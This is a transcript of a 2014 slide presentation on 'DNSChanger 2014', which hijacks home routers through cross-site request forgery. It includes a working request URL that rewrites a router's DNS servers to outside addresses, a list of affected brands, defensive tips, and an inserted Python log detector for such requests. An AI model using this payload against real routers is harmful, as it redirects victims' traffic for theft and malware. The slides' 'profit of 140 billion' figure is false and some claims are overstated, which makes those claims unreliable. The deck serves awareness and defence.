csrf change dns

DNSchanger 2014, Alfons Tanujaya

Upload: alfons-tanujaya

Post on 30-Jun-2015

Category:

Internet


DESCRIPTION

DNSChanger 2 exploiting your routers

TRANSCRIPT

Page 1: Csrf change dns

DNSchanger 2014

Alfons Tanujaya

Page 2: Csrf change dns

DNSchanger 2007

• Active 2007 - 2011

• Infected more than 4 million PC and Mac computers

• Online ads, spam, scams

• Profit of 140 billion

• 8 March 2012, servers brought down, a small internet doomsday?

Page 3: Csrf change dns

DNSchanger 1

Page 4: Csrf change dns

DNSChanger 2014 Symptom

Page 5: Csrf change dns

What is this ?

• No antivirus of any brand can deal with this malware.

• It affects not only Windows but also Linux, Mac and Android phones.

• Even if the computer is formatted, it happens again.

Sea-surf = CSRF

Page 6: Csrf change dns

CSRF Cross Site Request Forgery

• A type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

• Attack is blind. Not good for credential stealing.

• But an ordinary weapon in the hands of a smart criminal can be deadly.

Page 7: Csrf change dns

DNSChanger 2014

• Changing DNS of vulnerable routers.

• Log all traffic via proxy, credential leak.

• Leads to malware installation.

• Leads to forged websites, which can lead to credential leaks.

• Improper advertisement, porn, malware etc.

• How many victims ? 300.000 routers x 5 users = 1,5 million computers.

Page 8: Csrf change dns

How it happens

http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=162.248.99.162&dnsserver2=199.85.127.10&Save=%B1%A3+%B4%E6
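A defensive check for the request shown above, as an added example that is not part of the original slides: it scans a URL log for requests to a private-address device that set DNS parameters to resolvers outside an allowlist, and notes whether the Referer came from another host. The log format, the allowlist and the sample lines are assumptions constructed for illustration; the first sample URL is the one from the slide.

```python
import ipaddress
from urllib.parse import urlsplit, parse_qsl

# Assumption: the resolvers this network is meant to hand out; adjust per site.
ALLOWED_DNS = {"192.168.1.1", "8.8.8.8", "8.8.4.4"}

def dns_change_findings(url, allowed=ALLOWED_DNS):
    """Return [(param, value)] for DNS parameters sent to a private-IP host
    whose value is an IP address outside the allowlist."""
    parts = urlsplit(url)
    try:
        host = ipaddress.ip_address(parts.hostname or "")
    except ValueError:
        return []                      # target is a name, not a bare IP
    if not host.is_private:
        return []
    findings = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if "dns" not in key.lower():
            continue
        try:
            addr = ipaddress.ip_address(value)
        except ValueError:
            continue                   # parameter value is not an address
        if str(addr) not in allowed:
            findings.append((key, str(addr)))
    return findings

def scan(lines, allowed=ALLOWED_DNS):
    """Each line: time client method url referer (hypothetical log format)."""
    alerts = []
    for line in lines:
        fields = line.split()
        if len(fields) != 5:
            continue
        when, client, _method, url, referer = fields
        changes = dns_change_findings(url, allowed)
        if changes:
            # A Referer from another host suggests the request was forged.
            cross_site = urlsplit(referer).hostname != urlsplit(url).hostname
            alerts.append({"time": when, "client": client,
                           "cross_site": cross_site, "changes": changes})
    return alerts

SAMPLE_LOG = [  # constructed lines; the first URL is the one from the slide
    "2014-03-01T10:00:01 192.168.1.23 GET http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=162.248.99.162&dnsserver2=199.85.127.10&Save=%B1%A3+%B4%E6 http://example.test/page.html",
    "2014-03-01T10:05:12 192.168.1.23 GET http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&dnsserver=8.8.8.8&dnsserver2=8.8.4.4 http://192.168.1.1/",
    "2014-03-01T10:06:40 192.168.1.23 GET http://example.test/search?q=dnsserver -",
]
```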

Page 9: Csrf change dns

List of vulnerable routers

• TP Link

• D-Link

• Micronet

• Tenda

Page 10: Csrf change dns

Solution

Sea Surf

SEA MONKEY

Page 11: Csrf change dns

SOLUTION

• Upgrade firmware. Not always successful → OpenWRT

• Solution: set DNS on the client to the ISP's / Google's DNS; local DNS overrides the router's, unless forced by the router

• T-FA Challenge token

• Do not use web-based administration

• Use https

• Use a separate browser dedicated to router administration, different from the one used for browsing

Page 12: Csrf change dns

[Diagram labels: get, Login form, Session Cookie, UNPS, Post Cookie; get, Auto submit form, Post Cookie]

Page 13: Csrf change dns

Resource

• http://cxsecurity.com/issue/WLB-2012100027